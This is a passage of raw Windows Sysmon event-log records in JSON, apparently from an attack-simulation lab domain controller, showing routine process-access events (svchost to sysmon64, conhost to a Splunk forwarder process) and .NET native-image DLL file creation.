C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8262,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8263,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8264,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8265,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8266,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8267,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010A2780E00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010A2780E00}","TargetProcessId":"4700","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8268,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:58.638\r\nProcessGuid: {E2A3D6B1-1365-5F25-0000-001089750E00}\r\nProcessId: 4968\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1368-0\\System.Data.Services.Client.dll\r\nCreationUtcTime: 2020-08-01 07:01:58.638","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:58.638","ProcessGuid":"{E2A3D6B1-1365-5F25-0000-001089750E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1368-0\\System.Data.Services.Client.dll","CreationUtcTime":"2020-08-01 07:01:58.638","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8269,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:58.701\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1366-5F25-0000-00104A7B0E00}\r\nTargetProcessId: 3220\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:58.701","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1366-5F25-0000-00104A7B0E00}","TargetProcessId":"3220","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\